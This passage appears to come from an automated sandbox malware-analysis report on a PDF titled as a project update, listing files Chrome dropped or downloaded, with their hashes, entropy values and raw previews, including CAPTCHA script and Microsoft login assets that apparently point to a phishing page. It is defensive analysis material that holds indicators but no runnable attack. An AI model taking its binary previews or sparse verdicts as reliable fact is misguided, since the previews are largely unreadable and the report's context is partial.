                                                  Preview:...........[}w.F....Bh..i3.M.t.rU.....]..M...@.(..........@..N..I-k..;w.....U.F..v....N....]....MC......U.]o>..mJ.w..~.5<......Z.h~8..8J..m......0.&Z:.Z.D_. .Z.....<.f..t..].I:..........b. ...}.ja......'..x......m6..c...$..........b|s......O.a..cE..u.2.*.6jG!.A.....P..?q@?"..).Mk.0.[."V..M..4...4.~}.?.i..D.}h|..$x.Ajm.S..H..-.x.If..]..1.D0.F......pq.(.|...y\...5....y2.q.Fq...[.|..n.b.i_D......xuR......I.TS.4..}|<...o....MG.+@.......\.?."...+[...A..&...{]......u..+p?......|...j....7...=H..cwp.38.;%c.....O..............p...X.g!....r...d..5.%x.....;...j6p...p......c.Nd.:...&.*....%.. tR.d.@.. ...1..6....i....:...s=..V...iN..1../tH..p<..Mo.......`&.7uA;..(lC.......4...?..0..[S@...D..|....=.wh2...<.. ...)..F...!. .C...k...S.pPt......s..K.V...w......7....Zn.d..t]l.........5=.(..#.....l._.Ip......-O.6.,......q4....!XS`6k..k.....9k....{~*.....X....q......l.>x..={j.n..W......e..Q..I/..;a..MS>.!5v.d.B+.o.....q...j.q..Z..=..@g.1q..,yBV91m.j>..4.o...
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:1
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Unicode text, UTF-8 text
                                                  Category:dropped
                                                  Size (bytes):13665
                                                  Entropy (8bit):4.492668383410837
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:4771A363CA048FD050F7E4BBFAD9997B
                                                  SHA1:33CCEA4DE0B606C55495356E8EF19C4EB03170FD
                                                  SHA-256:B6F7D8953D08295BE7C41392B47B22C86F6CED404CA7AB0C674608F74D87E583
                                                  SHA-512:E2E48AF45B75C44843E558B1C53F1C3173BF2E354924DFBECAD8C08804A367BEF60E355A30D7F7D00FA7B9B450F5A6177B65339716077167D941BDCC45D20CEB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:(function () {. 'use strict';.. var extend = function () {. var length = arguments.length;. var target = arguments[0] || {};. if (typeof target != "object" && typeof target != "function") {. target = {};. }. if (length == 1) {. target = this;. i--;. }. for (var i = 1; i < length; i++) {. var source = arguments[i];. for (var key in source) {. if (Object.prototype.hasOwnProperty.call(source, key)) {. target[key] = source[key];. }. }. }. return target;. }.. var isFunction = function isFunction(obj) {. return typeof obj === "function" && typeof obj.nodeType !== "number";. };.. var SliderCaptcha = function (element, options) {. this.$element = element;. this.options = extend({}, SliderCaptcha.DEFAULTS, options);. this.$element.style.position = 'relative';. this.$e
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:GIF image data, version 89a, 352 x 3
                                                  Category:downloaded
                                                  Size (bytes):3620
                                                  Entropy (8bit):6.867828878374734
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                  SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                  SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                  SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif
                                                  Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                  Category:dropped
                                                  Size (bytes):116343
                                                  Entropy (8bit):7.997640489040715
                                                  Encrypted:true
                                                  SSDEEP:
                                                  MD5:3063B0DA40B45B46602FCE99AC53D315
                                                  SHA1:57883FF854B80AD2A76479A0273BE9218B4DA553
                                                  SHA-256:C60FB365DF08D31F36EDA468941C309AE3A917ED784A30495800F05E5F98B66B
                                                  SHA-512:3EAF55117A825B588972F6AE324F6173EF4F2A309BAB69A9A6CC43C8F9A4EE25C2FA86752C8912542CC353727DC54A034B369D4A4451F0C3B20206C16FA9FE98
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,.......X.?......-....J.....I.;....t..FSw...a7i...c..Y{.-..>a..4h.Eo..c#...O....~..d....Z..z.'...s.D..E...jb.O.F..0.VW>..]%6........x..O>E.'a0U.....w....."..9.az.6....<a.?..<qvx........ct.K..s.C3..d#..#^R.z..A..u.f..........s.....M.rb(.\v.....%.k....i.f...,C.s..bY..K#...~.>..D..j....m.71..}...37h........P{..7!@...|..ZR.]V....."...0.o....7..peCG....px..j.%r2.....R.k5m..s.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142534
                                                  Category:downloaded
                                                  Size (bytes):49954
                                                  Entropy (8bit):7.99493321471063
                                                  Encrypted:true
                                                  SSDEEP:
                                                  MD5:E16AC075AC754DBD1CF969508220E30D
                                                  SHA1:69A91FF7A1C044231D6D28B4DD4C6AD3D34F2A50
                                                  SHA-256:E8AC3DCEF9E67CC776542A40C71B719D41668DF41D294C1A49A5AD23C5A5B5EC
                                                  SHA-512:12C4E6E5BD999E7BF431DCA707DA4BB5193D2795DD139DCAFC38CAFA757A88F75068D3F2821840068247B9F6CFB55178EF223CDB3349444E622EA4A8E69700A6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/js/BssoInterrupt_Core_eaF-Fe71oZcWvr096r6xEw2.js
                                                  Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                  File type:PDF document, version 1.7, 0 pages
                                                  Entropy (8bit):7.928356575250209
                                                  TrID:
                                                  • Adobe Portable Document Format (5005/1) 100.00%
                                                  File name:Bontrageroutdoors_Project_Update_202557516.pdf
                                                  File size:53'361 bytes
                                                  MD5:53e9f4e07eaeb212156d58106f2f9e11
                                                  SHA1:af8e5e25a4380e915747dfdaaa14a585951bea39
                                                  SHA256:6e3ae62a864941f4ecc40ad9c93b56bbc769bb0a9931341c188a06a307261bd2
                                                  SHA512:fa235c26eca4011e854eb7f1258e5119cbfb3f4db9cf89252ef44737b56bcddf0bf53458ddde547f4fcd5ef81b37502678bcbf4039e99214196210228274b73b
                                                  SSDEEP:1536:L/SBU0emQzGGXu5v+FZMst1t8r9H199at:TSBWmQiGeBsGot
                                                  TLSH:2933E057B58F8C4FED4560235617BE30683D6B025794E1A3D3AE1380A34EEBA870B46B
                                                  File Content Preview:%PDF-1.7.1 0 obj.<< /Type /Catalog./Outlines 2 0 R./Pages 3 0 R >>.endobj.2 0 obj.<< /Type /Outlines /Count 0 >>.endobj.3 0 obj.<< /Type /Pages./Kids [6 0 R.]./Count 1./Resources <<./ProcSet 4 0 R./Font << ./F1 8 0 R.>>./XObject << ./I1 9 0 R.>>.>>./Media
                                                  Icon Hash:62cc8caeb29e8ae0

                                                  General

                                                  Header:%PDF-1.7
                                                  Total Entropy:7.928357
                                                  Total Bytes:53361
                                                  Stream Entropy:7.929893
                                                  Stream Bytes:52010
                                                  Entropy outside Streams:5.037624
                                                  Bytes outside Streams:1351
                                                  Number of EOF found:1
                                                  Bytes after EOF:
                                                  NameCount
                                                  obj9
                                                  endobj9
                                                  stream2
                                                  endstream2
                                                  xref1
                                                  trailer1
                                                  startxref1
                                                  /Page1
                                                  /Encrypt0
                                                  /ObjStm0
                                                  /URI0
                                                  /JS0
                                                  /JavaScript0
                                                  /AA0
                                                  /OpenAction0
                                                  /AcroForm0
                                                  /JBIG2Decode0
                                                  /RichMedia0
                                                  /Launch0
                                                  /EmbeddedFile0

                                                  Image Streams

                                                  IDDHASHMD5Preview
                                                  91110c060ec160400cdbbd994d3514d3617462d53050f2d6d